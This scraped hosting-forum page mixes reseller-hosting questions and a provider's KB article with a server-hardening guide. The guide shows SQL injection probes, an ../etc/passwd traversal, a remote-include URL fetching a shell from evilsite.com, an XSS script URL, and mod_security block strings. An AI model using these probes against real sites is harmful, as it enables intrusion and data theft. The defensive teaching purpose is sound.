Best Reseller Web Hosting Company ...
Feb 22, 2008HostWW.net - quite nice and good so far (with Cpanel) and Resellerzoom.com still works.
View 6 RepliesHostWW.net - quite nice and good so far (with Cpanel) and Resellerzoom.com still works.
View 6 RepliesIf your about to start up your own hosting company i would reccomend JustGotVPS.com there staff are VERY helpfull and quick support staff times. Cheap VPS's that are genuin i am currently running one of there top end ones with Cpanel with no problem. I would like to point out i have nothing to do with JustGotVPs.com i am writing this because of there great service and Admin support. I reccomend if your on a reseller to get one of these VPS's.
View 0 Replies View RelatedHi, Guys can you pls recommend me some reputable companies who are offering reseller discounts for selling dedicated servers.
View 6 Replies View RelatedWhich company do you think is good to resell from?
It should be a decent and stable host I suppose... so Will cirtexhosting be the suitabke solution? Do you know what are they and how quality they are?
if i want to make image hosting such as allyoucanupload or imageshack , where hosting should i go to,... i was with hostgator and they suspended me for it.
View 14 Replies View RelatedThis question gets asked a lot in our Helpdesk and I figured I would post our knowledgebase article here to help anyone else wondering the Pros and Cons of Unlimited Domain Shared Hosting vs. Reseller Hosting. If anyone has anything else to add, I appreciate any feedback on how we can improve our KB article.
----------------------------------------------------------------------
Given the present state of shared hosting, many clients may ask "Why would I need a Reseller account if I can host unlimited Addon and Parked domains within a single shared hosting account?". There is certainly enough Disk Space and Bandwidth provided in many of today's hosting packages, so why bother to purchase a Reseller account?
Many don't realize the drawbacks of hosting large numbers of domains within a single hosting account until they've already packed tens of them onto a single package.
So how do you know whether a Reseller account or Shared Hosting account is right for you? The answer is in how you plan to provide access to others and how "mission-critical" the sites are. You should consider the following factors when deciding on hosting a large number of domains:
1. Who will be managing these sites?
2. How important is site security between sites?
3. Will these domains need dedicated SSLs?
4. How resource intensive will these sites be (RAM, CPU, MySQL)?
In a nutshell, Reseller plans are for those who wish to host websites for other sub-clients and a shared hosting package is for a single individual managing multiple personal domains. We'll go over the 4 points above in greater detail.
1. Who will be managing these site?
If you personally own multiple domains and wish to host them within the same hosting space, you can easily do so with an Addon or Parked domain. An addon domain will allow you to host a new domain within a subdirectory of your hosting space. A parked domain will allow you to have multiple domain names point to the same content. Since addon domains reside within the same user space as your main domain, you can manage all of your domains with a single login. You can see the problem if you want to provide another user with access. Since all accounts are managed with a single set of login credentials, if you give another user access to their addon domain you are also giving them access to your main domain. If you have vital information stored on your main domain and you are hosting another domain as an addon domain for someone else, you cannot provide them access to their hosting without compromising the integrity of your main domain.
When hosting sites as a Reseller, your clients in turn will want access to their account and will want exclusive rights to their disk space and server resources. With a Reseller account, each sub-account you create gets its own username, password, and isolated user space on the server. Individual clients of yours have access to their user space and their user space alone. In addition to the isolation with regards to access concerns, each account also gets their own cPanel access. All of the same great features that you use to manage your sites can also be given to your clients. Next time client Y wants to add an email account, you don't have to do it for them for fear of giving them access to your cPanel, you can simply give them their login details and they can manage their own email accounts.
2. How important is site security between sites?
This is along the same lines as point 1. This is not necessarily related to who you are hosting for, but what content you are hosting. Imagine that you are a webmaster and you are hosting your own personal site-in-a-box community forums (such as PHPBB or vBulliten) on your main domain and a company website for a paying client on an addon domain. It is not uncommon for popular scripts to have security flaws in older versions. Script authors will often update security flaws in later versions of their software. For this reason, it is very important to keep scripts up to date on your site. But let's assume you forget to update your scripts for a couple of months and an unscrupulous individual takes advantage of a well known security hole. Using this exploit, they gain access to your forums and any subdirectories. Since you are hosting another domain as an addon, they now have access to this domain's content as well. A site defacement on this company's site may not bode well for you when they are considering you for web master services in the future.
If these two domains had been separate into two individual users (i.e. two subaccounts created through a Reseller), their content would've been inherently isolated server side by Linux's user management. Sure, your forums still would've been affected by the security hole, but the break-in would've been isolated to your site alone.
Going back to our example, let's say that instead of a corporate website as an addon domain you are hosting an image gallery site for all of your cats. In this case, it may not be a big deal if a compromise in your main domain spreads to your addon domain. After all, they are both owned by you and you're only losing some time and effort to restore these sites from your local backups (which I'm sure you've actively maintained ). But then again, you are losing time and time is money. If these sites had been separated into individual users, again, you'd only have to restore one site's content.
The idea here is isolation. Reseller plans provide you with the peace of mind to know that if one of your users doesn't keep up with their site's content as actively as they should, their actions won't negatively impact the content hosted on other domains. If you and those you host in your addons are diligent webmasters, maybe this point won't have much bearing on your decision. Only you can say for sure.
3. Will these domains need SSLs?
As of this writing, SSL certificates must have a dedicated IP address to be installed. If you are hosting multiple domains on the same shared hosting package, you can still install an SSL (or purchase a dedicated IP address and install one) but you are limited to exactly one SSL on your account. If you are hosting multiple domains on the same package (and consequently the same IP), you must choose which domains gets to have the dedicated SSL.
Sub accounts of Resellers can each be placed onto separate IP addresses and, as a result, can each have their own dedicated SSL installed.
Of course, both shared accounts and Resellers' sub accounts can use the server's shared SSL free of charge. However, some clients prefer to see their domain in the URL bar when they visit https.
4. How resource intensive will these sites be (RAM, CPU, MySQL)?
We've already established that disk space and bandwidth will be no problem. But what about CPU, RAM, and MySQL resources?
It's important to be aware of the resource needs of your website. As administrators, we have to make sure all users "play nice" on the server. We can't have user X eating all of the CPU cycles computing pi to the trillionth decimal place while you are trying to serve web pages to your loyal visitors. We have to monitor the actions of all of our users and in the event someone is stepping beyond the bounds of acceptable resource consumption, we have to take action. In most cases, this entails disabling the abusive script, but in extreme cases we have to suspend the abusive user account to prevent other domains from encountering performance degradation on their sites.
If you are hosting 100 domains as addon domains, all serving nothing but static HTML pages, maybe you will stay off the radar.
But considering most sites are more complicated than static HTML, you may want to be aware of how many sites you host as addons and what content they serve. If you're hosting the latest and greatest Joomla modules, with up to date news feeds, integrated forums modules, polls, blog posts, etc your site can certainly require a degree of CPU to serve your pages. Now imagine you have 5 or 10 of these sites all hosted as addon domains. The resources these sites need to generate their content can quickly add up and before you know it you've got a friendly email from Acenet, Inc. in your inbox wondering why your user is consuming 2 of the 8 CPU cores on the server. That may be an exaggeration, but you get the idea. In the event your resource usage becomes so excessive that we have to suspend your user, now all of your sites are down instead of whichever one may be the direct cause of the spike in CPU, RAM, or MySQL consumption.
If each of these had been separate Reseller accounts, the offending account could've been suspended temporarily while we work through the cause, leaving the rest of your domains live and kicking.
The conclusion here is that you need to be aware of the needs of your sites in a general sense. Hosting unlimited domains within a shared hosting space is certainly a nice feature. For those webmasters who have multiple presences on the web, it's very convenient to be able to manage all of their personal domains from a single control panel. For those entrepreneurs who are hosting multiple domains for other individuals, the features and security associated with a Reseller plan and the inherent isolation of Linux users is a must have.
----------------------------------------------------------------------
Here is my dilemma, thanks to a thread in these forums I was directed to a hosting website called pc-core.net and I was interested in using them, because it does not appear that they oversell at all. My question is regarding the fact that they have the shared hosting for $12/month with ~5gb of disk space and 50gb of transfer. I then just looked at reseller hosting for the heck of it, and noticed i could get a reseller hosting account with 45gb storage and 450gb of bandwidth for $10/month. Even though I wont be selling hosting, or anything like that, can I use a reseller hosting account like a normal shared hosting account?...just with more space and bandwidth?
View 3 Replies View RelatedI would like to know the different between the shared hosting and reseller hosting?
View 7 Replies View RelatedI'm planning to launch an e-commerce website for photo and gift printing. I went on Google and found a few websites having Top 10 web hosting companies information. I am really confuse which one is the best for my website.
I'm not sure how many users and traffic the website will get and don't want to pay extra $$$s for VPS or dedicated servers
I was wondering if you guys would recommend a hosting company to use a VPS? I am a web designer and as a side job i am thinking of selling reseller accounts for very cheap prices. I am mainly concerned mainly because of the RAM most VPS have . I mean is 248 and 512 mb really ok? Also , anyone have an insight on "burst ram"? What does this mean?
View 14 Replies View RelatedI will be starting up a new hosting company that will offer free and paid hosting. My question is, should I start out with a reseller, and move on as needed? I was simply thinking of starting out with a VPS, so I could simply skip the reseller part. I read elsewhere that some simply get a reseller and get another reseller when they need it.
What path should I choose. I could always get a VPS later on, but why not get one now? This is one reason I ask, because since reading about the reseller post, I am now split on this.
To note, have used a reseller before, but not a VPS. I do want to eventually learn to run a VPS, so this could be the time to do so.
I recently made a purchase of a really busy website and I need about 1024 Guaranteed Ram 20Gb+ disk space and 1000gb bandwidth VPS.
Please make some suggestions based on:
1- Customer/Technical Support
2- Pricing
3- Their ability to maintain a good service at all times.
we have about 10 servers in iweb.ca , iweb is good but account managers support are very poor ! for example when I need to upgrade my server I should contact my account manager and my account manager answer to my email after 2 weeks ! (if he answer)so I want to transfer my servers to another company ,
what's your suggestions ?
most of our servers are Linux.
P.S : we are Iranian
I have tried Hostgator, Netfirms, UbiquityHosting, doesn't seem to allow to execute Rebol in cgi-bin
View 12 Replies View RelatedI've read articles that said it's generally bad to use the domain registrar as the hosting company(forgot the reason though)Right now I have some domains in Goddady and 1and1, and have a Hostgator account. I am thinking about just using Goddady's hosting service so I only need to manage my Goddady and 1and1 accounts instead of managing 3 accounts.
I am going to use Wordpress.org to build the sites
I have recently built my first database application.I used SQL Server 2005 Express edition because it is free. The drawback is that it can only hold 4GB of data. But the database is also compatible with any SQL Server edition.
I'm wondering what my options are - a lot of hosting companies seem to offer a greater storage capacity and then limit the actual size of the SQl database. i.e. 10GB of online diskspace with a 600MB SQL database.
I have a dilemma now as I don't know which company is better to use for my needs- allwebnow.com or webhostgiant.com.
I want to use shared hosting.
I am in the process of creating a site for my family, which is spread out around the world. I am using Joomla and have built my site on Siteground as my host.
My site will have low traffic, for family only, but I want my family to be able to post pictures, chat and blog.
I am very happy with Siteground but it has come to my attention that even though they offer 750gb of space I can only have up to 5gb of picture files (gif, jpg, etc.) I feel that I will eventually exceed this and being new at the whole site creation, I do not want to risk data being lost (database, files, etc.) when the time comes to transfer to a new host.
The site is not active yet as I am still working out the kinks and adding more pages. I figure if I am going to make a move to another host now would be the best time.
So I guess the question I have is what hosts, in your opinions, would be the best for the site I explained and still be able to work in Joomla.
can any one recommend me a uk hosting company.
View 5 Replies View RelatedI wanted Media Temple's DV hosting for reselling, but, they don't provide Windows Hosting.
So, which is the best Windows Host for reselling, around mt's DV pricing.
Is it Rackspace? or some other company?
I am very interested in web hosting and domain names and i would like to run my own small business web hosting company. I don't have large knowledge in this domain, but i found some reseller company e.g Hostgator. The process is buying some spaces and i resell them.
View 23 Replies View Relatedi have website named almtechnology.com.now problem is that i have lost my hosting detail from where i have purchase.for eg i want to ask question about dns and email forwarding how i can ask my questions (submit ticket)to my hosting company how i know who is the company hosted my detail
View 3 Replies View RelatedI have an old domain thats hosted somewhere (cant remember the name of the hosting company) I need to migrate/move that domain/host across to a new server but i dont have any details of my old/current hosting
Ive done a whois on it and all its giving me for dns is ns1.chost2.com
Can you tell me which company owns the above dns or how i can find out?
-= Securing Your Hosting Company =-
-- Credits: DeadlyData --
Part I. Your own websites security.
The first step you always want to take to secure your hosting company is to make sure your own website.
Is completely secure some things to do if you are using a common CMS Google it with the word exploit make sure your version is not on there.
Next try any Get Vars in your scripts and put a ' at the end of them what I mean is you have = you add ' so it's yourwebsite.com/page?=' or any other similar thing not only page= you may also try char(39) rather then only ' most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the ' but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.
If you get an error you might want to check the script.
The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.
If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)...
If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use
The following to browse into other places ../../../../ if they wanted to they'd view your passwd file via ../../../../../../etc/passwd
Well right now you'd say big Woop they got some users maybe not but still have the ability to go to any forum on
that server and upload an avatar with PHP-EXIF data in it then include it
Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all...
Recommendations fix the script have mod security block all ../../../../../ to a certain point attempts.
Ok next were going to discuss the abilities of an RFI and how to block it...
So the things you can do with an RFI well lets see remotely include an PHP file that will execute its php file like so
www.yoursite.com/file.php?file=evilsite.com/shell.txt? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.
Prevention add http:// to your mod security this way when they try remotely including a file in the URL
[url] mod_security will block it.
Ok our next subject is XSS this is a tricky one on account of there are many ways around mod security blocking this...
What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn't really see it... but when you clicked they could potentially grab your cookie or any current stored browser information.
With this they could use your cookie as their own to login as you... maybe even get password information from this
cookie...
Now the other type of XSS is something you have to train your clients to look out for if some one ever asks for help and sends you a link that is accessing a remote website in the URL such as...
www.mysite.com/info.php?xss=<script>src=[url]
Never click it what so ever... ban the person who has sent this.
Ok now for the mod_security bans... add <script> add <body= add </script> add ">
And this should fix your XSS problems that can actually cause damage...
As for SQL injection the way to block this is to... add ' or /* to the mod security be sure to add in char(39) as it's ' in php and php will in fact read it from a URL and interpret it as ' and still launch the sql injection.
One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.
Zend should fix this problem.
Never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.
Part II. Your Employees
RULE-1 -PASSWORDS
Do not use password even more then once on your servers if you do the first time some one gets your password to any
Thing they have the ability to get into every thing on your server from there they get other peoples passwords and get more and more access over time they can take the whole hosting company...
RULE-2 -PHONE CHATS
Always request a person's information verify every bit of it is correct also try to remember their voice because hackers will call you and try to get into people servers they can have correct information just by whoising the persons domain that their trying to get.
RULE-3 -Email CHATS
This one is a bit easier there is no emotion to what the person is trying to do...
If they slip up on one peace of information be sure to email them back and ask them to correct it before even
Sending any thing back or touching any thing.
RULE-4 -Talking to each other
While talking to each other in public services.. or services that my be able to be taped such as an IRC...
Be sure not to mention any root passwords, client names, etc...
Part III. Securing Your Server
Ok well first were going to do the obvious and CHMOD /home to 755
This is simple just go ahead and type chmod 755 /home
Or
CD /
chmod 755 home
Next were going to make sure no user has any bash access what so ever.
This may already be setup by the current hosting control panel you are using...
If not were going to nano /etc/passwd and make sure all Linux users that you don't want having bash are set to
/sbin/nologin
I realize some hosting companies also do dedicated server companies so it wouldn't work out if your client didn't have
bash to the server.
So this is mainly based for the shared hosting servers.
Part IV. PHP Configuration.
Now were going to do some things to PHP.ini
usr/local/lib/php.ini
^ On Most Systems
safe_mode = On
safe_mode_gid = Off
open_basedir = directory [:...]
safe_mode_exec_dir = directory [:...]
expose_php = Off
register_globals = Off
display_errors =Off
log_errors = On
error_log = filename
magic_quotes=On
disable_functions = show_source, system, shell_exec, passthru, exec,
phpinfo, popen, proc_open, base64_decode, base64_encodem, proc_terminate
Some explanations of the functions your disabling.
show_source(), Disables functions most shells use to view the source of other files one commonly
c99, ModfiedC99 (c100), ModfiedC99(x2300)
phpinfo(), Sometimes will bring up XSS, also numeral overflows have been found while using PHPINFO() that and you don't
want people getting your version of PHP and etc. to attempt to exploit it if you may just be out of date or to up to
date.
system, Allows Bash Commands Via PHP
shell_exec, Allows Bash Commands via PHP
exec, Allows Bash Commands Via PHP
popen, Almost like Bash not quite but close using PHP
proc_open, Almost like bash not quite but close using PHP
base64_decode, decodes base64 encryptions... reason for disabling also allows users with server access to bypass mod security
base64_encode, encodes base64 encryptions... reason for disabling also allows users with server access to bypass mod security
proc_terminate, Terminates Processes running on the server.
Some reasons for having magic quotes on, it disables most nullbyte attempts (%00)
And will stop a small majority of SQL injections.
Part V. MySQL and Apache Configurations
Disable all out bound MYSQL connections...
Besides from Trusted Servers
This may actually be set in the host's field of the users in the actual MYSQL table, for each user account it lets you
Give them an IP or type any I'd recommend giving them an IP...
Although when you give them and IP don't worry it's not that you can only have one IP able to access that user you
do in fact have the ability to recreate the user
over and over and fill in the IP field differently each time.
Next you need to configure your apache to where it runs 1 process for each linux user and all scripts ran by that user run under their unix/linux permissions,GID & UID
A reference Document on how to do this can be found here.
[url]
Comments:
What this will do with apache is pretty much make sure that the users can't access other users directories on the
Server this is a common vulnerability you get access to one site on the server and you get access to all websites on the same
server... this protects against it. All though apache is running under each user using SuEXEC would solve that problem.
Part VI. SSH Keys.
It's not required but it is a recommendation to setup SSH keys this way people do not have the ability to brute force your SSH server.
A tutorial on how to do this can be found here:
[url]
If you do not wish to setup SSH Keys you may also use Linux host.allow, host.deny files to sort which ranges have the ability to access your server and which do not have the ability to access your server.
There are some references for this located here
[url]
And here
[url]
Part VII. BackDoor-Trojan-Rootkit Proctection & FireWall Setup
Down To The Back Door Protection
In the even some one gets access to your server even with all the security you've gotten so far they might just be able to figure out one way or another to slip a backdoor in or in the case of ubiquity a botnet client,
So what exactly are some things you can do to prevent this if not stop it.
Well I honestly don't think you can stop things like root kits, Trojans, viruses, botnet clients etc. from being on your System.
But you can stop or remove them once their on your system, or prevent them from being ran.
What all can a person do just by having the ability to upload a file.
Not much but once they find ways to execute what they have uploaded then you can pretty much consider them having root to your server.
At this point they can run multiple exploits that may be able to BoF(Buffer Over Flow) An process running under root on your system and from there they could get lucky and have the ability to execute code as that process.
Another thing they can do without having root is install an botnet client once this is done they have the ability to use your servers as their own resource to take other things down.
Trojans & Viruses on Linux aren't too much of a worry as there aren't too many out there but the ones that are made might just have enough access to delete most of the HDD on the Linux system.
Now a couple things I've researched on that can help prevent this.
---
Root Kit Hunter.
---
Description:
Root kit scanner is scanning tool to ensure you for about 99.9%* you're clean of nasty tools. This tool scans for
Root kits, backdoors and local exploits by running tests like:
- MD5 hash compare
- Look for default files used by root kits
- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files
-------
Comments:
I highly recommend Root Kit Hunter.
---
Download
---
[url]
---
Clam Antivirus
---
Description:
* Command-line scanner
* Fast, multi-threaded daemon with support for on-access scanning
* milter interface for sendmail
* advanced database updater with support for scripted updates and digital signatures
* virus scanner C library
* on-access scanning (Linux and FreeBSD)
* virus database updated multiple times per day (see home page for total number of signatures)
* built-in support for various archive formats, including Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM,
BinHex, SIS and others
* built-in support for almost all mail file formats
* built-in support for ELF executables and Portable Executable files compressed with UPX, FSG, Petite, NsPack,
wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
* built-in support for popular document formats including MS Office and Mac Office files, HTML, RTF and PDF
-------
Comments:
Honestly I'd recommend this even when using Mod-Security I've built shells that will in fact bypass modsecurity well
this well scan the source codes of the PHP shell
and make sure there�s nothing that could potentially harm or allow the user to have to much access over the system.
---
Download
---
[url]
--
Banning The Brute Forcers, FTP, SSH, etc.
---
APF (Advanced Policy Firewall)
---
Description:
Rather then grabbing this one off their site I figured I'd write one.
Well in my experience this is nothing like a normal firewall you would use on an windows system it checks for things like people trying to brute force Cpanel, SSH, FTP, etc. accounts.
Allows alot of configuration options some of which may also benfit in bandwidth saving and DDoS prevention,
Over all it blocks those ports your not using so even if some one manages to get an undetectable backdoor/botnet on your systems.
Then this will block it from connecting back to them and them connecting back to it.
---
Comments:
I will tell you no though this will be a pain to setup while hosting so many teamspeaks on account of all the ports you would have to constantly forward.
To make sure every one has the ability to get into their teamspeaks,
Some commands that can be used with this Firewall just incase you decide to use it.
Banning an IP
apf -d IP
Unbanning an IP
apf -u IP
I recommend ignoring your own IP in the
/etc/apf/allow_hosts.rules
Using the following syntax you can ignore your IP from all firewall rules meaning you don't follow them.
d=PORT:d=IP // ENABLES YOUR IP COMMING IN ON THE PORT
out:d=PORT:d=IP // ENABLES YOUR IP GOING OUT ON THE PORT
For ranges you may do the following 192.168.1.1/255
It will then forward from 192.168.1.1 to 192.168.1.255 to be enabled
---
Download
---
[url]
Part VIII. DDoS Protection and Saving Bandwith + Remote Loging.
---
Server Monitoring Remotely
---
Log Watch
---
Description:
An application that runs twenty-four seven on your server and sends the following things after going through them to your email.
-Apache_Access Logs
-Apache_Error Logs
-SSH_LOGIN's Failed Or Succeeded
-FTP Logs
-Mail Logs
-Current HDD Sizes
-Kernel Logs
-Mail Logs
-Yum/APT-GET Logs
Comments:
This thing is very useful attempts to gain access to your server will be automatically emailed to you along with every thing that is not found gave some one and forbidden error and etc.
The only main requirement is that you have SendMail Running.
Mail Spam Protection
---
Spam Assassin
---
Description:
The core distribution consists of command line tools to perform filtering along with Mail:pamAssassin, a set of Perl modules which allow SpamAssassin to be used in a wide range of products.
Comments:
Never used it my self because I've never really had to bad of mail spam problems on my server but from what I've
read it is in fact pretty good at filtering out the spam in your emails.
---
Download
---
[url]
---
Some Extra Mail Protection
---
Be sure that your mail-server only allows your Server to use it or any other servers you may trust and deny all
others
many people will attempt to use open mail servers and spam resources.
---
DDoS Protection & Bandwidth Saving.
---
Ok first off some things people might do while DDoSing you.
Unless theDDoS attack is very strong I highly doubt it will take your whole server offline most DDoS attacks will mainly hit their targets port
in most cases their target would be Apache, but in other cases maybe even a teamspeak it's a little more difficult to stop without having to get all of your clients IP addresses and adding them to the ignore lists in APF
But a basic thing you can do is have APF installed drop all ICMP packets. This will disable the ability to ping your server.
Next Install DDoS Deflate
---
DDoS Deflate
---
Comments/Description:
From my own experience an well written Perl Script that was made to run along with APF and monitor how many times an
IP is connected to your server before it bans it you may also run it manually typing the following in shell.
ddos Number Of Connections Allowed
When this is typed the Perl script will then run an netstat command check how many times each IP is connected and if there are more then the number of connections you specified then it will automatically run a command in APF for the IP to be banned.
---
More Information can be found on this at
[url]
----
Download
----
[url]
Ok now for bandwidth saving and DDoS protection at the same time there is this really cool thing made for apache servers it's called mod_evasive
It will limit the number of connections a person may open with apache and if they open to many it will ban them for what ever time you specify in the config.
---
mod_evasive
---
Detailed Description:
mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.
Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:
* Requesting the same page more than a few times per second
* Making more than 50 concurrent requests on the same child per second
* Making any requests while temporarily blacklisted (on a blocking list)
This method has worked well in both single-server script attacks as well as distributed attacks, but just
like other evasive tools, is only as useful to the point of bandwidth and processor consumption (e.g. the amount of bandwidth and processor required to receive/process/respond to invalid requests), which is why it's a good idea to integrate this with your firewalls and routers for maximum protection.
This module instantiates for each listener individually and therefore has a built-in cleanup mechanism and scaling capabilities. Because of this per-child design, legitimate requests are never compromised (even from proxies and NAT addresses) but only scripted attacks. Even a user repeatedly clicking on 'reload' should not be affected
Unless they do it maliciously. mod_evasive is fully tweak able through the Apache configuration file, easy to
Incorporate into your web server, and easy to use.
--- Comments:
This is a module I have in fact used with Apache before it honestly can get annoying if you configure it incorrectly
because you will be simply visiting the website and get banned.
---
Download/Install Tutorial
---
[url]
--= That Will Cover Alot Of Security Issues =-
I have a question about web hosting companies.
If the company which I take my plan with it has been hacked or damaged. sorry about my English I don't know how to say that!
Then What will I do?
is my website will gone?
My boss has recently asked me to source a new host for our servers. At the moment we're running 8 Windows boxes but are unhappy with the service we're receiving from our hosting company. We are looking for a managed hosting company, that has offices in the UK and US to look after the servers.
At the moment we haven't nailed down our exact requirements so I'm just really looking for any recommendations you guys might have. I've done a wee bit of Googling and have found a company called Rackspace but I'm ideally looking to contact around 5 companies to see who can offer us the best deal.
I'm looking for a dedicated hosting server to store more than 800GB in video. This video will not be played back, this place is just to store and where people can download.
As far as I can tell my only solutions is dedicated, but if anyone can offer me a better solution please let me know. Before I had this videos on different servers but the company does not allow me to keep them for storage.
I need to know the top 3 hosting companies in the US, and why you like them.
I like aplus.net but after doing some research I found out that this company is a nightmare.
Please, I need help really fast! Thank you all in advanced for your suggestions.
Let's say, I want to setup a hosting company in 3 different location (US, EU, ASIA) and I want to host 3 different servers on each datacenter. They will not be cluster. Customers will have an option to chose their datacenter location on the ordering page. But I want to use only one IP block /24 for all 3 different location.
Is it possible?
I currently own my own hosting company using another companies servers, which is good, and I've learned a lot of the ins and outs of hosting, but there's a great deal I need to learn before I start Hosting using my own servers. Can anyone provide some good resources or books that might help me get on with my mission?
View 5 Replies View RelatedI switch from Hostway about a month ago.
ThisWebHost has a price plan suitable for any hosting need (I saved over 50% from what I was paying previously, because the other pricing plan was richer than what I needed).
ThisWebHost only charges $1 per month for a dedicated IP address and has superior customer service (very timeline response once you open a ticket) and is also accessible on Twitter. Added bonus is that their CS is located in the US and they speak English.
Another huge perk was that they transferred my site for free.
So far up time has been 100%.
if I should get my domain separately from my hosting company. I'm going to buy a host gator hosting plan and I don't know if I should get my domain from them too? They charge $15/year for domains. My only problem is that if I have to leave from host gator in less than a year for some reason, will I be able to go to another hosting company and have the same domain name as I had with host gator?
View 14 Replies View Related